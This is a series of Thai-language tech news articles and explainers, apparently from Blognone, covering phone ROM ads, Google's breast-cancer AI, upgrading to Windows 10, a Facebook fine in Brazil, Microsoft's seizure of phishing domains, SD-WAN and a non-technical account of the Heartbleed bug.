# Realme ประกาศเพิ่มโฆษณาในรอม ColorOS แต่สามารถปิดได้ Realme ค่ายมือถือที่เติบโตไวที่สุดในปี 2019 ประกาศเพิ่ม "โฆษณา" ในรอม ColorOS 6 ของตัวเอง เช่นเดียวกับมือถือจีนบางค่าย (ColorOS เป็นรอมตัวเดียวกับ Oppo ซึ่งเป็นบริษัทแม่เดียวกันกับ Realme) Realme ใช้คำว่า "commercial content recommendation" ที่นำเสนอแอพและลิงก์โฆษณาต่างๆ โดยมันจะแสดงในแอพ Phone Manager และหน้า Security Check หลังติดตั้งแอพใหม่ เหตุผลของ Realme คือต้องการหารายได้ผ่านช่องทางอื่นๆ เพื่อให้สามารถนำเสนอสินค้าราคาถูกต่อไปได้ ข่าวดีเล็กๆ คือฟีเจอร์นี้สามารถปิดได้ในหน้า Settings > Additional Settings > Content Recommendation ที่มา - Realme, Talk Android
# AI ของกูเกิล ตรวจจับมะเร็งเต้านมจากแมมโมแกรม ลดข้อผิดพลาดที่แม้แต่แพทย์ยังพลาด กูเกิลออกรายงานเรื่องการใช้ AI จากสถาบันวิจัย DeepMind ตรวจจับมะเร็งเต้านมจากแมมโมแกรม พบว่าสามารถลดข้อผิดพลาดได้ดีขึ้น กูเกิลได้ร่วมมือกับสถาบันวิจัยทางการแพทย์ในสหรัฐฯและอังกฤษเพื่อพัฒนาความสามารถ AI ในการตรวจจับมะเร็งเต้านมมาได้กว่า 2 ปีแล้ว โดยกูเกิลฝึกระบบด้วยการใช้รูปแมมโมแกรมที่ไม่ระบุตัวตนจากผู้หญิงมากกว่า 25,000 คนในสหราชอาณาจักรและอีก 3,000 คนในสหรัฐอเมริกา เพื่อดูว่า AI จะสามารถสังเกตสัญญาณมะเร็งเต้านมได้หรือไม่ ผลคือ ระบบสามารถลดภาวะ false positive ได้ 5.7% ในกลุ่มผู้หญิงจากสหรัฐฯ และ 1.2% ในกลุ่มผู้หญิงจากอังกฤษ นอกจากนี้ระบบยังลดภาวะ false negative ได้ 9.4% ในกลุ่มผู้หญิงจากสหรัฐฯ และ 2.7% ในกลุ่มผู้หญิงจากอังกฤษ ปัจจุบันแมมโมแกรมเป็นวิธีที่นิยมในการตรวจจับมะเร็ง แต่ก็ยังเป็นความท้าทาย เพราะแมมโมแกรมยังมีข้อผิดพลาดได้ รูปเอ็กซเรย์ออกมาปกติแม้จะมีมะเร็งก่อตัวอยู่ก็ตาม โดยแพทย์เรียกภาวะนี้ว่า false negative และยังมีภาวะที่ภาพเอ็กซเรย์ออกมาผิดปกติ แต่ตรวจสอบแล้วไม่มีมะเร็งเต้านม ภาวะนี้เรียกว่า false positive ทางกูเกิลระบุว่า ประสิทธิภาพของ AI ทำได้ดีกว่าคนที่ต้องตรวจจริง เพราะ AI มีข้อมูลแค่รูปแมมโมแกรม แต่แพทย์จะมีข้อมูลประวัติคนไข้ และรูปแมมโมแกรมก่อนหน้านี้ของคนไข้ด้วย ถือเป็นสัญญาณที่ดีที่ AI จะลดข้อผิดพลาดในการตรวจจับได้ อย่างไรก็ตาม กูเกิลบอกว่าระบบจะช่วยงานแพทย์รังสีวิทยา ไม่ได้มาแทนที่พวกเขา ที่มา - Google Blog, The Verge
# [Howto] ช่องทางอัพเกรด Windows 7/8.1 เป็น Windows 10 ฟรี ยังสามารถทำได้ สิ่งแรกๆ ที่เราจะเห็นในโลกไอทีปี 2020 คือ Windows 7 จะหมดระยะซัพพอร์ตในวันที่ 14 มกราคม 2020 (นั่นคืออีก 2 สัปดาห์) แม้ไมโครซอฟท์พยายามทุกทางให้ผู้ใช้อัพเกรดเป็น Windows 10 แต่ยังมีผู้ใช้ Windows 7 อีกจำนวนมาก (สถิติของ Blognone เองในรอบ 1 เดือนที่ผ่านมา มีผู้ใช้ Windows 7 ประมาณ 6.3% ของผู้ใช้ทั้งหมด หรือคิดเป็น 23% ของผู้ใช้ Windows ทั้งหมด) เหตุผลที่ผู้ใช้เหล่านี้ไม่ได้อัพเกรดเป็น Windows 10 คงแตกต่างกันไป เช่น คอมพิวเตอร์เก่า (แต่จริงๆ Windows 10 ใช้สเปกขั้นต่ำเท่ากับ Windows 7), ไม่ชอบหรือไม่คุ้นเคยกับ Windows 10 หรือ อาจตกรถ ไม่ทันการอัพเกรดฟรีในช่วงปี 2015-2016 อย่างไรก็ตาม ไมโครซอฟท์ยังแอบหลับตาข้าง โดยเปิดให้ผู้ใช้ Windows 7/Windows 8.1 ที่มีไลเซนส์แท้ อัพเกรดเป็น Windows 10 ได้ต่อไป บทความนี้จะสอนวิธีการทำครับ ขั้นตอนการอัพเกรด Windows 7/Windows 8.1 เป็น Windows 10 ไม่ต่างอะไรจากกระบวนการปกติ สิ่งที่เราต้องทำคือเข้าหน้าเว็บของไมโครซอฟท์ แล้วดาวน์โหลดไฟล์ตัวช่วยอัพเดตมาลงเครื่อง เราจะได้ไฟล์ชื่อ MediaCreationTool1909.exe มา (ขนาดไฟล์ 18.3MB) เปิดไฟล์ขึ้นมาและดำเนินตามกระบวนการบนหน้าจอได้เลย (เลือก Upgrade this PC now แล้วกด Next ไปเรื่อยๆ เป็นอันเสร็จ ใช้เวลาประมาณ 1-2 ชั่วโมงขึ้นกับความเร็วเน็ตด้วย) ผมลองกับเครื่องเก่าที่เป็น Windows 8.1 ก็พบว่าสามารถอัพเกรดเป็น Windows 10 ได้อย่างไม่มีปัญหา โดยจะได้ Windows 10 v1909 ตัวใหม่ล่าสุดมาเสร็จสรรพ สำหรับคนที่ไม่เคยใช้ Windows 10 ต้องอธิบายว่า ระบบไลเซนส์จะเปลี่ยนจากการผูกกับคีย์หรือ serial number ไปเป็นการผูกกับบัญชี Microsoft Account ของเราแทน (แปลว่าไม่ต้องใส่คีย์อีกแล้ว) ดังนั้นหากเราใช้ Windows 7/8.1 ที่เป็นของแท้ (ไม่ว่าจะแถมมากับเครื่องหรือซื้อไลเซนส์แยกเอง) ก็สามารถอัพเกรดเป็น Windows 10 ได้ทันที และไมโครซอฟท์ก็ยังไม่มีท่าทีว่าจะยกเลิกช่องทางนี้ในเร็ววัน คำแนะนำแยกตามเวอร์ชัน คนที่ใช้ Windows 7 แท้ ควรอัพเกรดเป็น Windows 10 ทันที ก่อนหมดอายุในวันที่ 14 มกราคม 2020 คนที่ใช้ Windows 8.1 แท้ ระยะซัพพอร์ตจะหมดอายุในเดือนมกราคม 2023 ยังสามารถใช้ได้อีกนาน แต่ไหนๆ อัพเกรดฟรีแล้ว ก็ได้ OS ที่ใหม่กว่า มีฟีเจอร์เยอะกว่า (ที่สำคัญคือน่ารำคาญน้อยกว่าด้วย) คนที่ใช้ Windows 7/8.1 เถื่อน ลงทุนอีกสักนิดซื้อ Windows 10 แท้ เพื่อความปลอดภัยที่ดีกว่าในระยะยาว วงการมัลแวร์ยุคนี้มันเถื่อน อย่าเสี่ยงเลย
# บราซิลสั่งปรับ Facebook จากกรณี Cambridge Analytica เป็นเงิน 1.6 ล้านดอลลาร์ รัฐบาลบราซิลสั่งปรับ Facebook เป็นมูลค่ากว่า 1.6 ล้านดอลลาร์ โดยเป็นการสั่งปรับอันเนื่องมาจากกรณีของ Cambridge Analytica สำหรับกรณีของ Cambridge Analytica นี้ มีการประเมินกันว่าผู้ได้รับผลกระทบทั่วโลกน่าจะอยู่ที่ราว 87 ล้านคน ซึ่งส่วนใหญ่จะอยู่ในสหรัฐฯ โดยกระทรวงยุติธรรมและความปลอดภัยสาธารณะของบราซิลระบุว่าข้อมูลที่หลุดไปในเหตุการณ์ครั้งนั้นกระทบชาวบราซิล 443,000 คน โดย Facebook ล้มเหลวในการให้ข้อมูลผู้ใช้เกี่ยวกับความสำคัญของผลลัพธ์ของการตั้งค่าด้านความเป็นส่วนตัว ทางบริษัทควรจะระมัดระวังมากกว่านี้หากปล่อยแชร์ข้อมูลของเพื่อนและเพื่อนของเพื่อนโดยอัตโนมัติ ส่วนฝั่ง Facebook เอง ตอนนี้ทางบริษัทได้ปรับเปลี่ยนแพลตฟอร์มและจำกัดการเข้าถึงข้อมูลโดยนักพัฒนาแล้ว และไม่มีหลักฐานที่ว่าข้อมูลผู้ใช้ในบราซิลถูกส่งต่อไปยัง Cambridge Analytica และตอนนี้ Facebook กำลังประเมินทางเลือกด้านกฎหมายสำหรับกรณีนี้ การสั่งปรับครั้งนี้ ด้วยมูลค่า 1.6 ล้านดอลลาร์ ถือว่าสูงกว่าที่ Facebook ถูกปรับในสหราชาณาจักรซึ่งเป็นประเทศที่ตั้งของบริษัท Cambridge Analytica มากกว่า 2 เท่า สำหรับ Facebook แล้ว เงินจำนวนนี้อาจไม่ใช่ปัญหา แต่ความเชื่อมั่นนั้นคือสิ่งที่บริษัทยังต้องทำการบ้านอย่างหนักต่อไป และภายในปีนี้ก็จะมีการเลือกตั้งที่สหรัฐฯ แล้ว ก็ถือเป็นโอกาสที่ดีในการพิสูจน์ตนเองอีกครั้งของ Facebook อ่านรายละเอียดเพิ่มเติมได้ที่: สรุปประเด็นฉาว Facebook และ Cambridge Analytica ที่มา - Bloomberg, Engadget
# ไมโครซอฟท์ยื่นฟ้องขอยึดโดเมน "rnicrosoft dot com" สำหรับ phishing สำเร็จ ระบุกลุ่มแฮกเกอร์มาจากเกาหลีเหนือ ไมโครซอฟท์ยื่นฟ้องต่อศาลสหรัฐฯ ยึดโดเมนสำหรับส่งอีเมล phishing ได้กว่า 50 โดเมนที่พยายามปลอมตัวเป็นไมโครซอฟท์ เช่น "rnicrosoft dot com" (ใช้ r และ n ประกอบเป็น m) โดยระบุว่าผู้ควบคุมโดเมนเหล่านี้คือกลุ่ม Thallium ที่ดำเนินการมาจากในเกาหลีเหนือ เหยื่อส่วนใหญ่ของกลุ่ม Thallium อยู่ใน สหรัฐฯ, ญี่ปุ่น, และเกาหลีใต้ โดยมักมุ่งเป้าไปที่เจ้าหน้าที่รัฐบาล, บริษัทที่ปรึกษาทางการเมือง (think tank), เจ้าหน้าที่มหาวิทยาลัย, หน่วยงานสิทธิมนุษยชน, และบุคคลที่ทำงานด้านอาวุธนิวเคลียร์ กลุ่ม Thallium มักส่งอีเมลหลอกเอารหัสผ่านจากผู้ใช้ จากนั้นก็ตั้งกฎการ forward อีเมลเพื่อให้รับอีเมลจากเหยื่อได้ตลอดเวลา บางครั้งก็ติดตั้งมัลแวร์ในเครื่องของเหยื่อเพื่อเข้าควบคุมคอมพิวเตอร์โดยตรง ที่มา - Microsoft ภาพตัวอย่างอีเมล
# กูเกิลหยุด "บริหารภาษี" ผ่านบริษัทในเบอร์มิวดา จ่ายค่าไลเซนส์ตรงเข้าสหรัฐฯ แล้ว สำนักข่าวรอยเตอร์รายงานถึงการยื่นภาษีของกูเกิลเมื่อปี 2018 ในเนเธอร์แลนด์ พบว่ากูเกิลหยุดใช้เทคนิค "Double Irish, Dutch sandwich" เพื่อลดการจ่ายภาษีในสหรัฐฯ จากเดิมที่มีการโอนรายได้ผ่านบริษัทในเบอร์มิวดาถึงกว่า 6 แสนล้านบาท (21.8 พันล้านดอลลาร์) ในปี 2018 โฆษกูเกิลส่งแถลงถึงรอยเตอร์ว่าบริษัทปรับรูปแบบการไลเซนส์ให้ง่ายลงโดยปรับค่าสัญญาอนุญาตให้จ่ายตรงเข้าสหรัฐฯ พร้อมกับระบุว่าที่ผ่านมาบริษัทก็จ่ายภาษีเฉลี่ยสูงกว่า 23% และ 80% เป็นภาษีในสหรัฐฯ เทคนิค Double Irish ที่มีการถ่ายโอนรายได้ข้ามประเทศไปมา เป็นช่องโหว่ของระบบภาษีที่มีประโยชน์ต่อบริษัทข้ามชาติหลายบริษัท กลไกทางภาษีทำให้บริษัทลดภาษีจากรายได้นอกสหรัฐฯ ลงเหลือต่ำกว่า 10% ที่มา - IT News ภาพสำนักงานใหญ่กูเกิลในสหรัฐฯ
# ProtonMail เปิดตัว ProtonCalendar ปฏิทินปลอดภัย เข้ารหัสแบบ End-to-End ProtonMail บริการอีเมลแบบเข้ารหัสที่เน้นความปลอดภัย-ความเป็นส่วนตัว เปิดตัว ProtonCalendar บริการปฏิทินที่เน้นความปลอดภัยแบบเดียวกัน เข้ารหัสข้อมูลแบบ end-to-end เมื่อเราสร้างปฏิทินหรือนัดหมายในแอพ ProtonCalendar ข้อมูลเหล่านี้จะถูกเข้ารหัสทันที ก่อนส่งไปเก็บบนเซิร์ฟเวอร์ ทำให้ไม่มีใครสามารถเข้าถึงข้อมูลของเราได้เลย นอกจากตัวเราเองเท่านั้น ตอนนี้ ProtonCalendar ยังมีแค่เวอร์ชันเว็บ มีสถานะเป็นเบต้า เปิดให้ผู้ใช้ ProtonMail แบบเสียเงินลองใช้งาน ส่วนแอพบน Android/iOS จะตามมาในปี 2020 นี้ ทีมงาน ProtonMail บอกว่าได้รับเสียงเรียกร้องให้สร้างแอพปฏิทินมานานแล้ว และขั้นต่อไปจะเปิด ProtonDrive สำหรับเก็บไฟล์อย่างปลอดภัยด้วย ที่มา - ProtonMail
# Mazda ระบุ สาเหตุที่ MX-30 มีแบตเตอรี่ขนาดเล็กเพราะเป็นมิตรกับสิ่งแวดล้อมมากกว่า เมื่อเดือนตุลาคมที่ผ่านมา Mazda ได้เปิดตัว Mazda MX-30 รถยนต์ไฟฟ้าล้วนรุ่นแรกของ Mazda ซึ่งเป็นที่วิจารณ์กันเรื่องแบตเตอรี่ที่มีขนาดค่อนข้างเล็กเมื่อเทียบกับรถยนต์ไฟฟ้ายี่ห้ออื่นๆ ในตลาด เพราะมีแบตเตอรี่ขนาดเพียง 35.5 กิโลวัตต์ชั่วโมง หรือวิ่งได้ราว 200 กิโลเมตรเท่านั้น ล่าสุด Christian Schultze ผู้อำนวยการฝ่ายวิจัยฝั่งยุโรปของ Mazda ได้ให้สัมภาษณ์ว่าเหตุผลที่ Mazda เลือกทำแบตเตอรี่ขนาดเล็กเป็นเพราะกระบวนการผลิตนั้นปล่อยก๊าซคาร์บอนไดออกไซด์น้อยกว่าแบตเตอรี่ขนาดใหญ่ หรือเทียบได้กับการใช้รถ Mazda 3 เครื่องยนต์ดีเซล ภาพโดย Mazda เขายังบอกอีกว่าการใช้แบตเตอรี่ขนาดใหญ่นั้นส่งผลเสียต่อสิ่งแวดล้อมมากกว่า โดย Mazda ได้คำนวณอัตราการปล่อยคาร์บอนไดออกไซด์ในระยะยาวมาแล้ว อย่างไรก็ตาม แม้ Mazda จะนำเรื่องสิ่งแวดล้อมมาอ้าง แต่ลูกค้าที่ต้องการแบตเตอรี่ขนาดใหญ่ก็ยังมีอยู่ ซึ่งอาจทำให้ Mazda เสียลูกค้ากลุ่มนี้ไป ที่มา - Engadget
# รู้จักเทคโนโลยี SD-WAN และวิเคราะห์การนำโซลูชั่นไปใช้งานในองค์กร ทุกวันนี้หลายคนคงได้ยินคำว่า **SD-WAN** หรือชื่อเต็มๆ software-defined wide area networking ซึ่งเป็นเทคโนโลยีเครือข่ายที่ถูกนำมาใช้อย่างกว้างขวางในปัจจุบัน โดยบริษัทวิจัย International Data Corp (IDC) ได้พยากรณ์ไว้ว่าในปี 2020 ตลาดของ SD-WAN จะมีมูลค่าสูงถึง 6 พันล้านดอลลาร์เลยทีเดียว ### อะไรคือ SD-WAN จากเดิมองค์กรมีลิงค์ WAN ที่เชื่อมต่อระหว่างสำนักงานสาขา (Remote Office หรือ Branch Office) กลับมาที่สำนักงานใหญ่ เพื่อใช้งานแอพพลิเคชั่นในองค์กร หรือเชื่อมต่อไปใช้งานอินเทอร์เน็ตที่สำนักงานใหญ่ โดยอาศัยช่องทางเชื่อมต่อประเภทต่างๆ ไม่ว่าจะเป็น Leased Line หรือ MPLS (Multiprotocol Label Switching) หรือผ่านอินเทอร์เน็ต (กรณีสาขาสามารถต่อออกอินเทอร์เน็ตได้เอง) แล้วทำท่อ (Tunnel) เสมือนที่มีความปลอดภัยอย่าง IPSec Tunneling ข้อเสียของการมีช่องทางเชื่อมต่อหลายช่องทางคือการบริหารเครือข่ายที่ซับซ้อน มีค่าใช้จ่ายสูง บวกกับแนวโน้มการใช้แอปพลิเคชั่นขององค์กรที่เปลี่ยนไป จากเดิมที่แอปพลิเคชั่นอยู่ในเซิร์ฟเวอร์ขององค์กร ก็ย้ายมาเป็นการใช้งานแอปพลิเคชั่นบนคลาวด์เพิ่มขึ้นสูงขึ้นเรื่อยๆ เช่น Office 365, บริการโทรศัพท์ผ่านอินเทอร์เน็ต, หรือบริการประชุมวิดีโอ และรวมไปถึงการใช้ช่องทางอินเทอร์เน็ตเป็นเสมือนลิงก์สำรองวิ่งกลับเข้าสู้สำนักงานใหญ่ แต่ถึงกระนั้น ในบางแอปพลิเคชั่นอย่าง ERP ที่ต้องการ latency ต่ำ บวกกับคุณภาพที่ดีของลิงก์ จึงเป็นเหตุผลให้ลูกค้าหลายรายยังคงเลือกใช้งานผ่าน MPLS ทั้งการใช้เป็นลิงก์หลักและลิงก์สำรองที่บริหารจัดการได้ยาก ### องค์ประกอบของ SD-WAN SD-WAN จึงเป็นการนำแนวคิด SDN (Software-Defined Networking) มาประยุกต์ใช้กับเครือข่าย WAN เพื่อให้องค์กรสามารถควบรวมเอาหลายฟังก์ชั่นการทำงาน เช่น Routing, Wan Optimization, Statefull firewall ให้สามารถใช้งานอยู่บนแพลตฟอร์มเดียวกัน องค์ประกอบหลักๆของ SD-WAN Solution คือ 1. SD-WAN Devices ทำหน้าที่อยู่ที่ Branch Office หรือ Remote Office 2. Orchestrator มองเป็น Centralized management tool ตัวที่จัดการ SD-WAN Devices ตั้งแต่ provisioning, configuring, monitoring เป็นต้น ในมุมผู้ให้บริการ SD-WAN Solution มีองค์ประกอบอีกหลายอย่างไม่ว่าจะเป็นการช่วยให้ผู้ให้บริการสามารถ deploy อุปกรณ์ SD-WAN Device ที่ปลายทางได้อย่างง่ายที่สุดแถบไม่ต้องทำอะไรยุ่งยากศัพท์ในทางเทคนิค เราเรียกมันว่า Zero-Touch-Provisioning (ZTP) ผู้ให้บริการสามารถให้บริหารลูกค้า SD-WAN แต่ล่ะรายได้อย่างมีประสิทธิภาพโดยใช้ Component เดียวกัน (Multi-Tenant) เป็นต้น ข้อดีอีกอย่างของ SD-WAN คือ Application Visibility ที่ทำเรามองเห็นภาพรวมของการใช้งานทราฟฟิกที่วิ่งผ่านลิงก์ของเรา ผู้ให้บริการ SD-WAN หลายรายสามารถตรวจสอบ delay หรือ loss ของแอปพลิเคชั่นได้ ร่วมกับใช้ฟังก์ชั่น load-sharing เพื่อย้ายหรือกระจายข้อมูลไปบนลิงก์ที่มีคุณภาพดีกว่าในช่วงเวลานั้นๆ ในแง่ค่าใช้จ่ายแล้ว SD-WAN ช่วยลดค่าใช้จ่ายเดิมจากการใช้งาน MPLS ลง ประมาณ 24% หรือมากกว่านั้น (ข้อมูลตัวเลขจาก SD-WAN Expert) ### ตัวอย่างการใช้งาน SD-WAN เพื่อความเข้าใจที่มากขึ้นขออนญาตยกตัวอย่างของการใช้งาน SD-WAN ดังนี้ องค์กรจากเดิมที่มีสาขาและสำนักงานใหญ่มีการใช้งานลิงก์หลัก (MPLS-1) และลิงก์สำรอง (MPLS-2) เพื่อใช้เป็นเส้นทางเชื่อมต่อให้สาขาวิ่งเข้ามาใช้งานแอปพลิเคชั่นและออกอินเทอร์เน็ตที่สำนักใหญ่ เมื่อองค์กรใช้งานแอปพลิเคชั่นคลาวด์มากขึ้น ตัวอย่างคือ Office 365 จึงต้องปรับเปลี่ยนดีไซน์เครือข่าย โดยให้สาขานั้นออกอินเทอร์เน็ตเองตรง โดยใช้เส้นทางผ่านสำนักใหญ่เป็นเส้นทางสำรอง องค์กรยกเลิกลิงก์สำรอง (MPLS-2) เปลี่ยนมาเป็นลิงก์อินเทอร์เน็ตแทน แต่เพื่อให้ตอบโจทย์การใช้งานเดิม ลิงก์อินเทอร์เน็ตจึงต้องทำหน้าที่เป็นลิงก์สำรองให้กับลิงก์หลักได้ด้วย เนื่องจากสาขายังคงต้องวิ่งเข้าสำนักใหญ่เพื่อใช้งานแอปพลิเคชั่นอื่นด้วย ด้วยโจทย์ข้างต้น โซลูชั่นที่ใช้งานกันทั่วไปคือทำ Site-To-Site VPN (IPSec) จากสาขาไปยังสำนักงานใหญ่ พอมาถึงจุดนี้หลายคนอาจมองเราก็ทำงานแบบนี้กันมาอยู่แล้วรึเปล่า คำตอบคือ SD-WAN Solution ของผู้ให้บริการแต่ละราย มีความสามารถในรายละเอียดปลีกย่อยต่างกัน แต่มีโครงสร้างหลักคล้ายกัน คือให้ลูกค้าสามารถใช้งานแอปพลิเคชั่นคลาวด์ หรือแอปพลิเคชั่นดั้งเดิมในองค์กร ผ่านลิงก์อินเทอร์เน็ตได้อย่างมีประสิทธิภาพ และสามารถบริหารจัดการและมอนิเตอร์ได้ ตัวอย่างคือ SD-WAN Device ที่สาขาสามารถตรวจรู้ว่าได้ว่าทราฟฟิกของ Office 365 เป็นอย่างไร และตรวจรู้ได้ว่าลิงค์อินเทอร์เน็ตในขณะนั้นมีคุณภาพดีพอที่จะส่งทราฟฟิก Office 365 ได้หรือไม่ หากตัวอุปกรณ์พบว่าคุณภาพลิงค์อินเทอร์เน็ตแย่ลงแต่ไม่ถึงกับดาวน์ ให้ทำการ re-route ทราฟฟิก Office 365 ทราฟฟิกกลับไปยังลิงก์หลัก (MPLS-1) เพื่อให้การใช้งานไม่ติดขัด ### อนาคตของ SD-WAN กล่าวโดยสรุปคือ SD-WAN แนวโน้มนั้นมาแน่นอนแต่จะช้าหรือเร็ว สำหรับบ้านเรานั้นขึ้นอยู่กับหลายปัจจัย เช่น ค่าใช้จ่ายของลิงก์ MPLS, การใช้งานบริการคลาวด์ขององค์กร คุณภาพการเชื่อมต่ออินเทอร์เน็ตและสุดท้ายคือ Trade-Off ของ SD-WAN Solution กับ Critical Applications ขององค์กร เป็นต้น อ้างอิงข้อมูลจาก [SDx Central](https://www.sdxcentral.com/articles/analysis/sd-wan-adoption/2017/05/)
# รู้จักบั๊กสะท้านโลก Heartbleed ทำไมถึงส่งผลกระทบต่อเว็บไซต์เป็นจำนวนมาก [บั๊ก Heartbleed ที่ถูกค้นพบเมื่อไม่กี่วันก่อน](https://www.blognone.com/node/55151) ส่งผลสะเทือนไปทั่วโลกไอที เหตุเพราะตัวซอฟต์แวร์ OpenSSL นั้นถูกใช้อย่างกว้างขวางในฐานะซอฟต์แวร์พื้นฐานสำหรับการเข้ารหัส [SSL/TLS](http://en.wikipedia.org/wiki/Transport_Layer_Security) เพื่อส่งข้อมูลแบบ HTTPS, VPN และทราฟฟิกเข้ารหัสแบบอื่นๆ การค้นพบช่องโหว่ Heartbleed ถือเป็นการ "เจาะที่หัวใจ" ทำลายความน่าเชื่อถือของการส่งข้อมูลผ่าน SSL/TLS ลงอย่างมาก (ตามสัดส่วนการใช้ OpenSSL) เพราะการเข้ารหัสที่เรา "เชื่อว่าปลอดภัย" นั้นกลับไม่ปลอดภัยอย่างที่เคยคิดกันไว้ บทความนี้จะอธิบายลักษณะของ Heartbleed โดยพื้นฐาน เพื่อให้ผู้อ่าน Blognone เข้าใจมากขึ้นว่ามันเกิดอะไรขึ้นกันแน่นะครับ ### พื้นฐานของการเข้ารหัส (Encryption) อย่างแรกเลยต้องเข้าใจพื้นฐานของการเข้ารหัสข้อมูลหรือ encryption เสียก่อน การเข้ารหัสในปัจจุบันมักใช้รูปแบบ "กุญแจคู่อสมมาตร" คือสุ่มสร้างกุญแจ (key) ออกมาสองตัวพร้อมกัน (แต่กุญแจไม่เหมือนกัน = อสมมาตร) คือ private key และ public key **กุญแจสาธารณะ (public key)** จะถูกส่งออกไปในที่สาธารณะ เช่น อินเทอร์เน็ต (ในมิติของความปลอดภัยคือ untrusted space) ส่วน**กุญแจส่วนตัว (private key)** จะถูกเก็บไว้ในเครื่องของผู้ใช้งานเท่านั้น (มองว่าเป็น trusted หรือ safe space) เมื่อ A ต้องการส่งข้อมูลลับให้ B ภายใต้สถาปัตยกรรมการเข้ารหัสแบบนี้ A จะนำ public key ของ B (ที่อยู่บนอินเทอร์เน็ต) มาผสมกับตัว "ข้อมูล" (data) ที่ต้องการส่ง เพื่อไม่ให้ใครคนอื่นอ่านได้ยกเว้นแต่ B ที่มีกุญแจคู่กันคือ private key ที่เก็บอยู่กับตัวของ B เท่านั้น ความน่าเชื่อถือของการเข้ารหัสข้อมูลลักษณะนี้จึงอยู่ที่ความน่าเชื่อถือในการเก็บรักษา private key ที่ใช้เป็นเครื่องมือถอดรหัสนั่นเอง (แอดมินระบบจึงต้องรักษา private key ให้ดียิ่งกว่าชีวิตของตัวเอง) ผู้สนใจสามารถอ่านรายละเอียดได้จากบทความเก่า [Asymmetric Cryptography: แตกต่างแต่เข้าใจกัน](https://www.blognone.com/node/45433) นะครับ ### การทำงานของ SSL/TLS การทำงานของ SSL/TLS อิงอยู่บนแนวคิดของการเข้ารหัสด้วยกุญแจคู่อสมมาตร แต่เพิ่มแนวคิดเรื่อง "ใบรับรอง" (certificate) ขึ้นมาเพื่อยืนยันตัวตนของผู้รับหรือผู้ส่งข้อมูลอีกชั้นหนึ่ง กระบวนการออกใบรับรองจำเป็นต้องมี "คนกลาง" เพื่อมายืนยันตัวตน ซึ่งคนกลางคนนี้จะถูกเรียกว่า หน่วยงานออกใบรับรอง (Certification Authority หรือ CA) ส่วนกระบวนการทั้งหมดตั้งแต่ต้นน้ำยันปลายน้ำจะเรียกรวมๆ ว่า [public-key infrastructure](http://en.wikipedia.org/wiki/Public-key_infrastructure) หรือ PKI SSL/TLS เป็น "มาตรฐาน" ที่อยู่บนกระดาษ (เวอร์ชันล่าสุดคือ TLS 1.2) ในทางปฏิบัติจำเป็นต้องมี "ซอฟต์แวร์" ขึ้นมาทำงานเข้ารหัสตามมาตรฐานดังกล่าว ซึ่งในโลกเราก็มีซอฟต์แวร์ SSL หลายตัว อย่างไรก็ตาม ซอฟต์แวร์ที่ได้รับความนิยมสูงสุดคือ OpenSSL ซึ่งเป็นซอฟต์แวร์โอเพนซอร์สที่ถูกใช้งานในวงกว้างมาก (ไมโครซอฟท์มีซอฟต์แวร์ SSL ของตัวเองที่ไม่มีบั๊กดังกล่าวเลยรอดหมดในกรณีนี้) ### ปัญหา Heartbleed ตามมาตรฐาน SSL/TLS จะมีตัวเลือกหนึ่งที่ชื่อว่า heartbeat (แปลตรงตัวคือ "หัวใจเต้น") เพื่อให้คอมพิวเตอร์ฝั่งใดฝั่งหนึ่งส่งข้อความสั้นๆ ไปยังอีกคอมพิวเตอร์ฝั่งหนึ่งเพื่อเช็คว่าอีกฝั่งยังออนไลน์อยู่ ปัญหาของ OpenSSL ที่เราเรียกกันว่า Heartbleed (ล้อตามชื่อ heartbeat) คือ OpenSSL ดัน "พลาด" เปิดโอกาสให้คอมพิวเตอร์ฝั่งหนึ่งสามารถส่งข้อความในฟอร์แมตพิเศษ เมื่ออีกฝั่งหนึ่งได้รับข้อความนี้ก็จะส่งข้อมูล (ที่อยู่ในหน่วยความจำ) แถมกลับไปให้ด้วย ข้อมูลแถมที่ว่านี้จึง "มีความเป็นไปได้" ที่จะเป็น private key ที่อยู่ในเครื่องปลายทางครับ ### ผลกระทบของ Heartbleed บั๊ก Heartbleed ถูกแก้ไขใน OpenSSL เวอร์ชันล่าสุดเรียบร้อยแล้ว แก้ง่ายมากแค่อัพเวอร์ชันหรือลงแพตช์ก็หาย แต่ประเด็นคือไม่มีใครทราบว่า private key ที่ถูกส่งผ่าน OpenSSL มาตั้งแต่ปี 2012 ถูกเจาะผ่านบั๊ก Heartbleed นั้นมีจำนวนเท่าไร และมีเว็บไซต์ไหนที่โดนเจาะบ้าง **ในทางทฤษฎี** ผลสะเทือนของ Heartbleed กว้างมาก แต่**ในทางปฏิบัติ**ไม่มีใครทราบว่าเคยมีใครใช้ช่องโหว่ Heartbleed มาเจาะข้อมูลแบบนี้ไปก่อนหรือไม่ ([แต่ทุกคนมโนกันว่า NSA เคยทำแน่ๆ](https://www.blognone.com/node/55296) ฮา) เมื่อ private key หลุดออกไปจึงทำให้ข้อมูลที่ถูกเข้ารหัสด้วย key อันนั้น (เช่น รหัสผ่านที่เราใช้เข้าเว็บไซต์ เลขบัตรเครดิต) ไม่ปลอดภัยตามไปด้วยนั่นเองครับ ตอนนี้คงเป็นหน้าที่ของเว็บไซต์และบริการออนไลน์ต่างๆ ที่จะสอบสวนดูว่าตัวเองได้รับผลกระทบจาก Heartbleed มากน้อยแค่ไหน รายละเอียดลองดูในข่าวเก่าๆ ของ Blognone - [ผลกระทบจากบั๊ก Heartbleed: ควรเปลี่ยนรหัสผ่าน Google, Facebook, Tumblr, Yahoo!, Dropbox](https://www.blognone.com/node/55250) - [LastPass แจ้งข่าว สมาชิกไม่ได้รับผลกระทบจากปัญหา Heartbleed](https://www.blognone.com/node/55265) - [บั๊ก Heartbleed กระทบผลิตภัณฑ์เครือข่ายของ Cisco, Juniper จำนวนมาก](https://www.blognone.com/node/55268) - [รวมเวอร์ชันของ OpenSSL บน Linux ที่มีปัญหาและที่อัพเดตแก้ไขบั๊ก Heartbleed แล้ว](https://www.blognone.com/node/55279) ### ผู้ใช้ควรทำตัวอย่างไรให้ปลอดภัยจาก Heartbleed ผู้ใช้คงทำอะไรไม่ได้มากนักเพราะไม่เกี่ยวข้องกับ Heartbleed โดยตรง (ปล่อยแอดมินอุดเซิร์ฟเวอร์กันไป) แต่สิ่งที่ทำได้ (บ้าง) คือแก้ไขข้อมูลส่วนตัวที่**อาจ**(ย้ำว่า "อาจ") ไม่ปลอดภัยเพราะ Heartbleed เช่น รหัสผ่าน นอกจากนี้เราอาจใช้มาตรการด้านความปลอดภัยอื่นๆ นอกเหนือจากรหัสผ่านในการปกป้องข้อมูลของเรา 